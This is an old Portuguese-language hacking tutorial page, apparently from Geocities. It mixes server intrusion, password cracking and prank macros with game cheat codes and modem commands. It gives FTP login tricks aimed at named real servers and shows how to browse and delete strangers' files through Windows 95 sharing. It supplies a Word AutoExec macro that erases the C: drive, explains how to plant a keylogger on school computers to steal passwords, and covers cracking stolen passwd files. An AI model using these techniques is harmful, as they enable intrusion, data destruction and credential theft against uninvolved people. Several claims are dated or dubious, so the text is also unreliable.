CRACKERS

COMO HACKEAR SERVIDORES DE FTP

Para Hackear um Servidor FTP, primeiro vc deve saber o endereco do Host ou
seu IP, para isto use o IPSCAN, digitando o IP Principal do Host:

Lista de Alguns FTP's

>>> ftp.mandic.com.br
>>> ftp.bestway.com.br
>>> ftp.netscape.com
>>> ftp.angelfire.com
>>> ftp.internetclub.com.br (servidor Hackeado por SeQ MaSsIvE,
WARBLADE(r), Speed, kkkkk e CRAMBLE)....


Let's HaCk !!!

Existem vários Programas de FTP'S, mas se não quiser saber de FTP porra
nenhuma use aquele do DOS !!!

Va ao Prompt e digite FTP, ao aparece o prompt ftp,
digite OPEN, ira abrir um outro Prompt (to), digite o nome do host ou seu
IP, tipo (to) ftp.mandic.com.br.

Ao conectar ele pedira a senha e o Password, tente usar os passwords UNIX,
(os famosos defaults) se nao der vc deve entrar INVISÍVEL !!!! Mas como
entrar invisível ?!?!?!
Isso e' fácil... no login pressione ENTER, no password pressione novamente...
Ira aparecer o prompt ftp novamente...., ai e' so' digitar:

quote user ftp 
quote cwd ~root 
quote pass ftp 

Pronto, você ja esta lá dentro!!!

Mas tem um porem..., se escrever a mensagem : USER RESTRICTION APLLY, voce
não esta Hackeando.., pois esta aplicada a proteção..., para isto tente com
outro user tipo quote cwd ~sys e os outros da lista UNIX....

ATENÇÃO !!!!

Nao tente Hackear usando o user normal de FTP'S, que e login : anonymous e
password: seu E-Mail, pois vai ser aplicado a proteção....

MEU DEUS, EU ENTREI, E AGORA O QUE FAÇO??????

Ao entrar vc vai estar no Diretório do login, tipo \home\root\,
Dai, para ver a lista de usuarios, voce volta um dir vá para o dir \home\ 
e cada dir e um usuario,... não tentem pegar as senhas , pois são
Cryptografadas...
Pois a maioria dos users usa a mesma senha login.... 
Ok... se você não sabe os comandos, ai vai a dica...., se você estiver no MS-DOS,
digite ? e tecle ENTER em qualquer lugar, pois ira aparecer os comandos...
e ai e s¢ Hackear !!!

OBS: Não fique mais que 5 Min em um servidor, pois ele cacara seu IP, e seu
login, e vai ser CADEIA !!!
Não responsabilizamos por atos cometidos nos Hosts... o problema e de quem
HaCkEiA, e não nosso, pois tome muito cuidado, e NUNCA, mas NUNCA apague
NADA !!!!!!!!!

Para sua maior seguranca, utilize uma senha roubada.

INVASAO POR IP 

Alegria de uns, tristeza de outros... na verdade, aqueles que utilizam a
rede Dial-Up do Win95 para sua coneccao com a internet podem estar correndo
serios riscos, a nao ser, e' claro, que assim conectam-se propositalmente,
com inten‡oes "diversas".

Utilizar-se de uma coneccao PPP do Win95 num provedor de acesso, significa
estar disponibilizando seu computador a todos os usuarios da Net. Mesmo sem
o compartilhamento de arquivos, existem diversas ferramentas que permitem a
outra pessoa conectar-se ao seu computador caso voce esteja utilizando esse
tipo de coneccao.

Conecte-se a Internet utilizando a rede Dial-Up do Win95. Se o seu provedor
nao disponibilizar uma conec‡Æo do tipo PPP, estas dicas nao funcionarao.

Verifique antes, se voce possui os drivers clientes para redes Microsoft.
Caso nao estejam instalados, instale-os atraves do Painel de Controle, no
icone Redes.

Verifique tambem se o compartilhamento de Arquivos e Impressoras est 
instalado.

Se estiver, voce estara sujeito a que outra pessoa conecte-se ao seu
computador simplesmente sabendo seu IP. Se bem que, para aqueles que ja
sabem, existem mil maneiras diferentes de se "burlar" a fraquinha seguran‡a
do Win95. Para voce poder encontrar outros computadores compartilhados, vocˆ
deve configurar WINS e LMHOSTS. O WINS e' utilizado para localizar os
computadores com IP fixo. O LMHOSTS, e' acionado automaticamente na procura
de computadores que possuem IP dinamicos.
ATEN€AO : TODOS ESSES ARQUIVOS SE ENCONTRAM NO C:\WINDOWS

Configurar essas opcoes e' simples. Va ao Painel de Controle e abra Rede.
Verifique as propriedades do protocolo TCP/IP. Ali voce encontrara a opcao
para ativar a resolu‡Æo WINS. No caso de vocˆ nao conhecer nenhum servidor
WINS, utilize 204.118.34.6 como primario e 204.118.34.11 como secundario.
Esses servidores sao dos USA, e gratuitos. Caso queira outros enderecos,
utilize um dos mecanismos de busca na Internet.

Para configurar o LMHOSTS, voce precisa criar um arquivo texto simples,
utilizando-se ate mesmo o Bloco de Notas do Windows. O arquivo criado deve
chamar-se LMHOSTS. E' nesse arquivo que ficarao os endere‡os de IP e os nomes
dos computadores que voce tera acesso. Para localizar um determinado
computador, voce digita o seu numero de IP e a seguir seu NetBios, na mesma
linha, separados por um espa‡o.

Se voce executar o programa NBSTSTAT, seguido da op‡Æo -N, voce obtera essa
lista, com o nome e o IP de seu computador sempre sendo o primeiro da lista,
seguido das outras maquinas disponiveis, tudo numa janela DOS.

Atrav‚s do Explorer voce podera ver os computadores disponiveis na rede, dos
quais voce ainda podera utilizar os discos mapeando-os, o que os tornara
unidades de seu computador.


Se voce for muito estupido e ainda nao entendeu, deixa eu explicar em outra
linguagem:

Utilizando essas configuracoes acima, voce pode, atraves do seu Windows
Explorer, acessar computadores de outras pessoas que nao tem nada a ver
com a historia, o cara pode estar do outro lado do mundo, la na Polonia ou
nos EUA, por exemplo, ele esta la quietinho, pesquisando paginas ou no
bate-papo, e voce pode mexer e fucar no computador dele como se ele fosse
uma unidade de disco! Isso mesmo! Faz de conta que o computador do cara seja
uma unidade de disquete, e voce pode mexer, mover, espionar, copiar, e ate
apagar arquivos do micro dele!

OBS: tome cuidado para nao ser preso!

MACROS DO WORD

Ainda hoje existe muita gente que so e capaz de abrir o WORD, editar,
negritar, sublinhar e mandar para impressora, muitos, milhares so sabem
mexer no basico mesmo. Eles nem imaginam o que tem por tras deste riquissimo
processador de texto.

Esta materia tem como objetivo fazer desde pequenas ate grandes sacanagens
com usuarios pentelhos.

Software/Versao Abrangida: Microsoft Word, versoes 6 (win3.11) e 7.0 (win95)
O Word possui um arquivo chamado NORMAL.DOT, onde estao todas as configuracoes
padrao do Word. Se por algum motivo este arquivo for deletado, o Word o cria
automaticamente quando for inicializado.

Niveis de Sacanagem:

Nivel 1..... Apenas uma brincadeira 
Nivel 2..... Apenas uma brincadeira de mau gosto 
Nivel 3..... Ja nao e' mais uma brincadeira. 

Primeiro voce precisa criar uma macro... siga os passos:

Entre no Word, feche a janela de documento, nao deixe nenhum documento aberto
(ativo), clique em Arquivo(File) depois Macro, coloque no nome da macro
"AutoExec" (obrigatorio) esta macro e' inicializada toda vez que o Word for
iniciado, depois clique em "Criar", delete as duas linhas que tiver la
(Sub MAIN e End Sub) e cole a rotina que tem logo mais abaixo.

PS: Existem outras formas e meios de criar uma macro,mas esta e' mais simples

Nivel 1

O nivel 1 serve para voce se mostrar, falando que entende do Word melhor do
que ninguem.
Cada vez que o usuario inicia o Word recebera uma mensagem... de alerta ou
qualquer outro coisa que sair da sua mente. Veja abaixo:

Sub MAIN
MsgBox "Voce e um pentelho! Eu nao irei prosseguir com o sistema", "Microsoft
Word", 5
MsgBox "Usuario Pirata Detectado", "FATAL ERROR", 16 
MsgBox "JAMES BOND 007 ", "007 na estrada Digital", 64 
End Sub 

Nota: faca tudo isso em uma so linha, e' que aqui nao deu pra colocar porque
faltou espaco, ok?

Nivel 2

E' para deixar o usuario irritadissimo. No corpo da macro cole este texto
abaixo:

Sub MAIN
ArquivoNovoPadrao 
Inserir "James" 
ArquivoNovoPadrao 
Inserir "Bond" 
ArquivoNovoPadrao 
Inserir "007" 
ArquivoNovoPadrao 
Inserir "James Bond 007 Na Estrada digital " 
ArquivoNovoPadrao 
Inserir "." 
ArquivoNovoPadrao 
Inserir "." 
ArquivoNovoPadrao 
Inserir "." 
ArquivoNovoPadrao 
Inserir "." 
ArquivoNovoPadrao 
Inserir "." 
ArquivoNovoPadrao 
Inserir "." 
ArquivoNovoPadrao 
Inserir "." 
ArquivoNovoPadrao 
Inserir "." 
ArquivoNovoPadrao 
Inserir "." 
ArquivoNovoPadrao 
Inserir "." 
ArquivoNovoPadrao 
Inserir "." 
ArquivoNovoPadrao 
Inserir "." 
ArquivoNovoPadrao 
Inserir "." 
ArquivoNovoPadrao 
Inserir "." 
ArquivoNovoPadrao 
Inserir "James Bond 007 Na Estrada digital " 
End Sub 


Nivel 3

Bom este nivel e pura sacanagem, com ele um simples clicar do mouse, e tudo
desaparece! Isso mesmo, "DEL *.*" ou apenas os documentos, voce e quem sabe.

Sub MAIN
Kill "C:\*.*" 
Kill "C:\WINDOWS\*.*" 
Kill "C:\WINWORD\*.*" 
End Sub 

Lembre-se de que estes macros sao gravados no arquivo default do word, ou
seja, no NORMAL.DOT. De este arquivo for deletado, o Word automaticamente
ira criar outro na inicializacao, entao se voce for fazer estas sacanagens
acima, proteja este arquivo, com o comando 'attrib +r'.
Detalhes: Existe uma forma de iniciar o Word, sem que inicialize a macro
'AutoExec' mas nao irei falar, descubra voce mesmo. A macro do word e uma
ferramenta riquissima, procure fucar. Voce pode fazer estas no seu proprio
computador (se cuide!), salvando sempre no arq. "normal.dot" depois copie
apenas este arquivo para aquele seu colega/amigo pentelho e saia de perto,
para nao explodir em voce.

LISTÇO !!!!
para se usar os comandos do MODEM!

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Comando: Resposta:

+++ATQ0 Mostra os resultados do comando.
+++ATQ1 NÆo mostra os resultados dos comandos.
+++ATN0 Desliga o modo de autodetecta‡Æo!
+++ATN1 Liga o modo de autodetecta‡Æo.
+++ATM0 Desliga o speaker do modem!
+++ATM2 Liga o speaker do modem!
+++ATL0 Volume baixo no speaker do modem.
+++ATL2 Volume m‚dio no speaker do modem.
+++ATL3 Volume alto no speaker do modem.
+++ATI(0 AT O 7) Mostra descri‡äes sobre o modem.
+++ATI5 Mostra os n§ armazenados na mem¢ria NVRAM.
+++ATH0 Hang-up
+++ATH1 Tipo o hang-up
+++ATF(0 AO 10) Seleciona uma versÆo para o modem (default=0)
+++ATE0 Desliga o echo, ECHO OFF
+++ATE1 Liga o echo, ECHO ON
+++ATDP Disca no modo pulse
+++ATDS=n Disca o n£mero na mem¢ria NVRAM (n=0-3).
AT&Z(0-3)=(N§) Armazena os n§'s na mem¢ria NVRAM.
ATS3D Serve para conectar atraves do telefone

RISE OF THE TRIAD

Em qualquer momento do jogo, digite estes passwords para se dar bem:

TOOSAD=> god mode

CHOJIN=> you are un-killable

GOTO=> level warp

SIXTOYS=> various useful items

FLYBOY=> enables you to fly

BADTRIP=> for a psychedelic experience ( try it!! )

BOING=> elasto mode

SPEED=> auto run mode, for the lazy

PANIC=> restore yourself to normal

DIMON=> light diminishing on

DIMOFF=> light diminishing off

LONDOM=> fog on

NODNOL=> fog off

GOGATES=> quit!

GOARCH=> teleport strainght to level end

GOTA386=> use 386 mode

LUNGDUNG=>gas mask

86ME=> use 8086 mode ( oh dear !! )

JOHNWOO=> dual pistols

PLUGEM=> MP40 sub-machine gun

VANILLA=> bazooka weapon

HOTTIMES=>heat seeker launcher

FIREBOMB=>fire-bomb weapon

BONES=> flame wall weapon

SEEYA=> hand of god ( try it !! )



OBS: ANTES de digitar os càdigos, digite DIPSTICK.


Quebrando senhas

Muitas pessoas confundem Crackear com Hackear, não é a mesma coisa, crackear é a "arte" de piratear, reconfigurar, modificar algum coisa, já hackear é a "arte" de "roubar", "pegar emprestada", usar conhecimentos para descobrir falhas nos sistemas.

    Bom, é mais ou menos isso aí, deu para entender né? Agora vamos Crackear um pouco:

1 - Quebrando o password da Bios

    Existem programas que são capazes de descobrir o password da Bios, eles agem diretamente com o setup do Pc, abaixo estão alguns programas próprios para "quebrar" password da Bios:

amipsw.com
ami.com
aw.com
amidecod.com

 2 - Quebrando o password do Windows

Windows 3.xx:    Para "quebrar" o password do Windows 3.xx você deve apertar "CTRL+ALT+DEL" depois tecle "ENTER" na caixa de verificação, depois que você passou do password, apague as linha "run=???" e "load=???" do arquivo "Win.ini" que está dentro do diretório do Windows (pode usar até mesmo o Notepad ou o Edit do MS-DOS).

Windows 95:    Para "quebrar" o password no Windows 95 é quase do mesmo modo do Windows 3.xx, quando aparecer a caixa de verificação do password aparecer aperte "CTRL+ALT+DEL", escolha a janela do Password na lista depois clique em "Finalizar tarefa", depois que passou do password, apague as linha "run=???" e "load=???" do arquivo "Win.ini" que está dentro do diretório do Windows (pode usar até mesmo o Notepad ou o Edit do MS-DOS).

 3 - Retirando o password da Proteção de Tela

Windows 3.xx:    Apague tudo que tiver na área de password do arquivo "control.ini" que está dentro do diretório do Windows (pode usar até mesmo o Edit do MS-DOS).

Windows 95:    Renomeie todos os arquivos com extensão "pwl" por um nome qualquer e anote em um papel as alterações feitas para caso ocorra algum problema.

 4 - Quebrando password dos documentos do Word

    Para "quebrar" o password de um documento do Word existem programas feitos por cracker específicos para isso, veja abaixo:

wfwcd.zip

5 - Quebrando password de arquivos ZIP

    Para "quebrar" o password de um arquivo ZIP, você deve usar algum desse programas abaixo:

zipcrack.zip (12,3k)
fzc104.zip

 6 - Quebrando pasword de arquivos ARJ

    Para "quebrar" o password de um arquivo ARJ, você deve usar algum desses programa abaixo:

brkarj10.zip
arjb1utg.zip

 

   Acima forma citados métodos usando programas a algumas manhas, agora abaixo vou descrever um método muito bom:

    Você já deve ter percebido que na sua escola existe algum tipo de rede ligando o computados central, com os computares dos alunos (bom, é assim aqui), mas essa rede só os professores "mais avançados" tem acesso, devido existir senhas para entrar. Você já deve te pensado como deve ter documentos importantes, provas, notas dos alunos, etc nesse computador central, já imagino se você entrar nele? todo mundo já deve te pensado nisso alguma vez, bom existe um método de se descobrir essa senha, claro, tem que ter paciência, não vai ser de um dia para o outro que você vai dá sorte de conseguir, mas você tem que usar a cabeça (mete THC na mente), vou descrever mais ou menos como você deve fazer isso, mas cuidado, pense nas conseqüências antes.

    Primeiro você tem que arranjar um desse programas abaixo:

Dos:                    keycopy.zip
Windows 95:     keytrap.zip

    Esse são programas que gravam em um arquivo todas as teclas apertas desde a execução do mesmo, já deve te sacado o que fazer agora né não, malandro.

    Depois de te pego esse arquivo você mete eles em um disquete, descompactado (claro), e leva ele para a escola no dia que você tiver aquela aula chata de química que vocês vão para a sala de informática e te que vê aquele programinha fudido "Hyper tabela periódica"(é esse o daqui), bom... por enquanto o professor tiver tirando duvidas dos Lamers você aproveita e mete ele no drive, vai no Prompt do DOS, copia os arquivos do disquete para o diretório Windows (copy a:\*.* c:\<diretório do windows>), de preferencia, copia os arquivos do "KeyCopy.zip", para que possa fazer ele rodar quando o sistema iniciar sem ninguém perceber. Após você ter copiado o mesmo para o diretório do Windows, vá para a raiz e insira as seguintes linhas no arquivo   "autoexec.bat" (use o Edit do MS-DOS):

cd\windows

<o nome do programa que esta no disquete>(acho que é KeyCopy mesmo)

   Agora salve o arquivo, saia do prompt e continue fingindo que está super interessado na matéria. Você tem que fazer isso no máximo em 1 minuto, para que ninguém perceba. Quando você voltar lá de novo, você pega o mesmo computador que você "crackeou", vá no diretório Windows de novo (via DOS) e copie o arquivo que o programa gravou as informações para o disquete (veja no "manual" do programa em que arquivo ele grava as teclas digitadas), depois disso na sua casa você vê com calma o arquivo e vê se tudo que foi gravado e procura alguma coisa a ver com senha, a se você chegou até aqui o resto é moleza... mas cuidado, seja discreto quando for pegar informações do computador central.

Crackeando passwords

Passwd

Você já deve ter muito ouvido falar do passwd. Ele é o arquivo que contém as senhas do servidor Linux. Fica no diretório /etc. Vale lembrar, que em alguns casos, apesar de haver o arquivo passwd, as senhas encontra-se no arquivo shadow. Bem, tanto faz, qual seja o arquivo que você conseguiu. Se você entrou em um sistema e conseguiu capturar o arquivo de senhas, já basta. Abra-o no bloco de notas e veja-o. Se estiver mais ou menos assim:

root:Jhknnajhg86JJaa:0:0:root:/root:/bin/bash

isso significa que o arquivo contém a senha e você poderá crackeá-lo. Mas se estiver assim:

root:x:0:0:root:/root:/bin/bash

você não poderá crackeá-lo pois o arquivo não está com a senha.

Bem, estando com o arquivo certo, para você crackeá-lo, você precisará de um crack e uma lista de palavras(WordList). O programa que usaremos é o Force Brute. Ele roda em DOS.

Baixe o Force Brute, descompacte-o e copie para o c:\.

Para criar a lista de palavras, baixe o WordList. Crie uma lista de palavras e copie esta lista para c:\.

Copie o arquivo de senhas também para o c:\.

Agora vá ao DOS e digite brute passwd @dict.txt

Fazendo isso, o Force Brute verificar a senha do arquivo passwd que está criptografada, pegará palavra por palavra do arquivo dict.txt(wordlist), e irá criptografar uma por uma, e comparar com as do arquivo passwd. Quando ele achar a senha, aparecerá uma mensagem dizendo o login e a senha achada que ele pertence.

Copyright © Cyber Nine/Crack's S.A todos direitos reservados
Hosted by www.Geocities.ws

Hosted by www.Geocities.ws

1